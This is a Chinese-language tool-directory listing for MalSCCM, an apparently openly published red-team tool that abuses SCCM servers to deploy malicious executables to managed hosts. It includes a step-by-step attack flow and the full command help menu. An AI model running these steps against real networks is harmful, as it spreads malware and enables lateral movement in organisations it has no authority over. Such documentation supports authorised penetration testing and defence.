Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
MalSCCM — 滥用SCCM服务器向受管主机部署恶意应用程序,以实现横向移动和红队操作。 | Kitploit
工具/GitHubGitHub/nettitude/malsccm
漏洞利用横向移动渗透测试红队
GitHubnettitude/malsccm

MalSCCM

滥用SCCM服务器向受管主机部署恶意应用程序,以实现横向移动和红队操作。

查看仓库
256384年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

MalSCCM

此工具允许你利用本地或远程的SCCM服务器向它们管理的客户端部署恶意应用程序。使用此工具时,当前进程必须对SCCM服务器拥有管理员权限。

通常情况下,SCCM的部署会将管理服务器和主服务器放在同一台主机上,此时locate命令返回的主机即可用作主服务器。

如果不是这种情况,你需要先攻陷locate返回的管理主机,然后在那台主机上再次运行locate以获取主服务器的主机名。一旦你获得了主机名和管理员权限,就可以继续操作了!

博客

关于工具用法的更多信息,请参考下面的博客。

  • https://labs.nettitude.com/blog/introducing-malsccm/

致谢

特别感谢 PowerSCCM (https://github.com/PowerShellMafia/PowerSCCM) —— 本工具完全基于它开发。没有 @harmj0y、@jaredcatkinson、@enigma0x3、@mattifestation 的工作,这一切都无法完成。

攻击流程

  • 攻陷客户端,使用 locate 查找管理服务器
  • 攻陷管理服务器,使用 locate 查找主服务器
  • 在主服务器上使用 inspect 查看可以攻击的目标
  • 为要横向移动到的机器创建一个新的设备组
  • 将目标添加到新组中
  • 创建一个指向世界可读共享上的恶意 EXE 的应用程序
  • 将应用程序部署到目标组
  • 强制目标组签入更新
  • 获利...
  • 清理应用程序和部署
  • 删除组

帮助菜单

root@kitploit:~
Commands listed below have optional parameters in <>. 

Attempt to find the SCCM management and primary servers:
    MalSCCM.exe locate

Inspect the primary server to gather SCCM information:
    MalSCCM.exe inspect </server:PrimarySiteHostname> </all /computers /deployments /groups /applications /forest /packages /primaryusers>

Create/Modify/Delete Groups to add targets in for deploying malicious apps. Groups can either be for devices or users:
    MalSCCM.exe group /create /groupname:example /grouptype:[user|device] </server:PrimarySiteHostname>
    MalSCCM.exe group /delete /groupname:example </server:PrimarySiteHostname>
    MalSCCM.exe group /addhost /groupname:example /host:examplehost </server:PrimarySiteHostname>
    MalSCCM.exe group /adduser /groupname:example /user:exampleuser </server:PrimarySiteHostname>

Create/Deploy/Delete malicious applications:
    MalSCCM.exe app /create /name:appname /uncpath:""\\unc\path"" </server:PrimarySiteHostname>
    MalSCCM.exe app /delete /name:appname </server:PrimarySiteHostname>
    MalSCCM.exe app /deploy /name:appname /groupname:example /assignmentname:example2 </server:PrimarySiteHostname>
    MalSCCM.exe app /deletedeploy /name:appname </server:PrimarySiteHostname>
    MalSCCM.exe app /cleanup /name:appname </server:PrimarySiteHostname>

Force devices of a group to checkin within a couple minutes:
    MalSCCM.exe checkin /groupname:example </server:PrimarySiteHostname>
下载工具